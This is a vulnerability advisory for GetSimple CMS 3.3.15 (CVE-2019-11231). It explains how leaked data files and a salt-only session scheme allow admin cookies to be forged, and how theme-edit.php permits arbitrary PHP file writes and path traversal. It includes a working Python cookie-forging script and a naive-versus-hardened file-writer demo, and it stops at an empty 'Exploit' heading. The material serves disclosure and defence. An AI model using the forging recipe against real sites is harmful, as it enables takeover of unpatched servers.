
SSD Secure Disclosure

Disclosing vulnerabilities responsibly since 2007

SSD Advisory – GetSimple CMS Unauthenticated Remote Code Execution

Vulnerabilities Summary
The following advisory describes a vulnerability in GetSimple CMS which allows unauthenticated attackers to perform Remote Code Execution.

CVE
CVE-2019-11231

Credit
An independent security researcher, truerand0m, reported this vulnerability to the SSD Secure Disclosure program.

Affected systems
GetSimple CMS version 3.3.15 (the latest release at the time of writing) and earlier.

Vendor Response
We notified the vendor on 21/1/2019 and sent a few reminder emails, but received no response.

Vulnerability Details
Insufficient input sanitation in the theme-edit.php file allows files with arbitrary content (PHP code, for example) to be written to the web root. Triggering the write requires an authenticated user; however, the authentication can be bypassed, which makes the chain exploitable by an unauthenticated attacker.

According to the official installation documentation (specifically step 10), the administrator is expected to upload all of the files, including the .htaccess files, and then run a health check. The .htaccess files are what keep the data directory from being served.

What is overlooked is that Apache no longer honours .htaccess files by default (AllowOverride defaults to None since Apache 2.3.9), so on a stock installation those protections are silently ignored and the user database is readable by anyone:

http://localhost/GetSimpleCMS-3.3.15/data/users/admin.xml

The passwords in that file are hashed, so we need another way in. The API key, which the CMS also uses as the salt for its session cookies, is readable from the same unprotected directory:

http://localhost/GetSimpleCMS-3.3.15/data/other/authorization.xml

Leaking the salt lets us target the session state, because the project rolled its own session handling instead of using PHP sessions. In admin/inc/configuration.php the cookie_name is built from information that can be read from the public frontend (the site name and the CMS version). Then, in admin/inc/cookie_functions.php, the session cookie is derived from that cookie name, the username and the salt, with no per-login random component.

If someone obtains the API key (44769f621e9b7db1bb19adbdf659b015) and the admin username (admin), they can bypass authentication outright. They need to supply two cookies: GS_ADMIN_USERNAME carrying the username, and a cookie whose name is sha1(cookie_name + salt) and whose value is sha1(username + salt). For version 3.3.15 (cookie_name getsimple_cookie_3315) and the values above, with the left side of the "=" being the cookie name and the right side its value:

Cookie: GS_ADMIN_USERNAME=admin; sha1(getsimple_cookie_3315 + 44769f621e9b7db1bb19adbdf659b015)=sha1(admin + 44769f621e9b7db1bb19adbdf659b015)

In general:

Cookie: GS_ADMIN_USERNAME={username}; sha1(getsimple_cookie_{cmsversion}{salt})=sha1({username}{salt})
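The forging step above, as an added example that is not part of the original advisory and not GetSimple's own code: it reads the salt and username out of the two leaked XML files, derives the cookie name for a given version, builds the cookie pair, and checks the result against a model of the server-side verification the advisory describes (cookie named sha1(cookie_name + salt) must equal sha1(username + salt)). The XML snippets are constructed samples shaped like the leaked files, and the element names `apikey` and `USR` are assumptions of this example.

```python
"""Forging the GetSimple CMS session cookie from leaked data (added example)."""
import hashlib
import xml.etree.ElementTree as ET

# Constructed sample of data/other/authorization.xml; the key is the one
# quoted in the advisory. The real file carries more fields.
AUTHORIZATION_XML = (
    "<item><apikey><![CDATA[44769f621e9b7db1bb19adbdf659b015]]></apikey></item>"
)

# Constructed sample of data/users/admin.xml. The password hash is
# irrelevant to the bypass, which is the whole point of the technique.
ADMIN_XML = "<item><USR><![CDATA[admin]]></USR><PWD><![CDATA[deadbeef]]></PWD></item>"


def extract_text(xml_text: str, tag: str) -> str:
    """Return the text of the first <tag> element in an XML document."""
    node = ET.fromstring(xml_text).find(f".//{tag}")
    if node is None or node.text is None:
        raise ValueError(f"element {tag!r} not found")
    return node.text.strip()


def cookie_name_for(version: str) -> str:
    """The cookie name is the version with the dots removed, as the
    advisory shows (3.3.15 -> getsimple_cookie_3315)."""
    return "getsimple_cookie_" + version.replace(".", "")


def forge_cookies(version: str, salt: str, username: str) -> dict:
    """Build the cookie jar an attacker sends to the admin pages:
    name = sha1(cookie_name + salt), value = sha1(username + salt)."""
    name = hashlib.sha1((cookie_name_for(version) + salt).encode()).hexdigest()
    value = hashlib.sha1((username + salt).encode()).hexdigest()
    return {"GS_ADMIN_USERNAME": username, name: value}


def server_accepts(cookies: dict, version: str, salt: str) -> bool:
    """Model of the server-side check as the advisory describes it (not
    the project's code): the username comes from GS_ADMIN_USERNAME and
    the session is valid when the cookie named sha1(cookie_name + salt)
    holds sha1(username + salt). Nothing is bound to a login event or a
    random token, which is why a leaked salt is sufficient."""
    username = cookies.get("GS_ADMIN_USERNAME", "")
    name = hashlib.sha1((cookie_name_for(version) + salt).encode()).hexdigest()
    expected = hashlib.sha1((username + salt).encode()).hexdigest()
    return cookies.get(name) == expected


def cookie_header(cookies: dict) -> str:
    """Serialise the jar into a Cookie request header."""
    return "; ".join(f"{k}={v}" for k, v in cookies.items())


if __name__ == "__main__":
    salt = extract_text(AUTHORIZATION_XML, "apikey")
    user = extract_text(ADMIN_XML, "USR")
    jar = forge_cookies("3.3.15", salt, user)
    print("Cookie:", cookie_header(jar))
    print("accepted by model:", server_accepts(jar, "3.3.15", salt))
```

Because every input to the cookie is either public (version), leaked (salt, username) or attacker-chosen, the forged jar is indistinguishable from a legitimate login; a cookie forged with the wrong salt or the wrong version simply fails the comparison.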

The file write lives in admin/theme-edit.php. The script handles form submissions sent via POST and verifies the CSRF nonce that accompanies them. If the nonce is correct, the content provided by the user is written to the requested file.

The target name is also vulnerable to path traversal, so files can be written outside the jailed themes directory root. We do not even need that: because of the .htaccess assumption above, a file written into the themes directory itself is served and executed by the web server, which is enough to gain a shell.

The other issue is that there is no check on the file extension before saving. The file is written on the assumption that the content parameter is safe, which allows the creation of web-accessible, executable files with arbitrary content.
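To make the two defects concrete, here is an added example (not GetSimple's code) that models the write the advisory describes beside a hardened version. `naive_save` joins the user-supplied file name onto the theme root and writes `content` unchanged, so a `../` prefix escapes the root and any extension is accepted. `hardened_save` canonicalises the path, refuses anything that resolves outside the root, and applies an extension allowlist. The parameter name `target` for the file path, the allowlist contents and the scratch directory are assumptions of this example; `content` is the parameter named in the advisory.

```python
"""Path-jail and extension checks for a theme file editor (added example)."""
import os
import tempfile


class RejectedWrite(ValueError):
    """Raised by the hardened writer when a request fails validation."""


def naive_save(theme_root: str, target: str, content: str) -> str:
    """Shape of the write the advisory describes: once the POST and nonce
    checks pass, the file name is joined onto the theme root and the
    content is written verbatim. No traversal or extension check."""
    path = os.path.join(theme_root, target)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)
    return path


def hardened_save(theme_root: str, target: str, content: str,
                  allowed_ext=(".css", ".js", ".html")) -> str:
    """Resolve the requested path, reject anything outside the theme root
    (covers '../' and absolute targets), and only accept allowlisted
    extensions. The allowlist is an assumption of this example."""
    root = os.path.realpath(theme_root)
    path = os.path.realpath(os.path.join(root, target))
    if os.path.commonpath([root, path]) != root:
        raise RejectedWrite(f"{target!r} resolves outside the theme root")
    if os.path.splitext(path)[1].lower() not in allowed_ext:
        raise RejectedWrite(f"{target!r} has a disallowed extension")
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)
    return path


def demo() -> dict:
    """Exercise both writers in a scratch tree and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = os.path.realpath(tmp)
        root = os.path.join(tmp, "theme")
        os.makedirs(root)
        payload = "<?php echo 'code execution'; ?>"  # constructed PHP payload
        results = {}

        # Naive: a .php file lands inside the served theme directory.
        p = naive_save(root, "shell.php", payload)
        with open(p) as fh:
            results["naive_php_in_root"] = p.startswith(root) and fh.read() == payload

        # Naive: traversal writes outside the theme root.
        p = naive_save(root, "../escaped.php", payload)
        results["naive_traversal_escaped"] = (
            os.path.realpath(p) == os.path.join(tmp, "escaped.php"))

        # Hardened: traversal is rejected.
        try:
            hardened_save(root, "../escaped2.php", payload)
            results["hardened_traversal_rejected"] = False
        except RejectedWrite:
            results["hardened_traversal_rejected"] = True

        # Hardened: disallowed extension is rejected even inside the root.
        try:
            hardened_save(root, "shell2.php", payload)
            results["hardened_php_rejected"] = False
        except RejectedWrite:
            results["hardened_php_rejected"] = True

        # Hardened: a legitimate stylesheet edit still works.
        p = hardened_save(root, "css/style.css", "body { margin: 0; }")
        results["hardened_css_written"] = os.path.isfile(p) and p.startswith(root)
        return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

One caveat on the allowlist: GetSimple themes are PHP templates, so a theme editor that must write .php files cannot be made safe by an extension check alone; for that feature the path jail plus real authentication (a session that does not derive entirely from a leakable salt) is what matters.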

Exploit
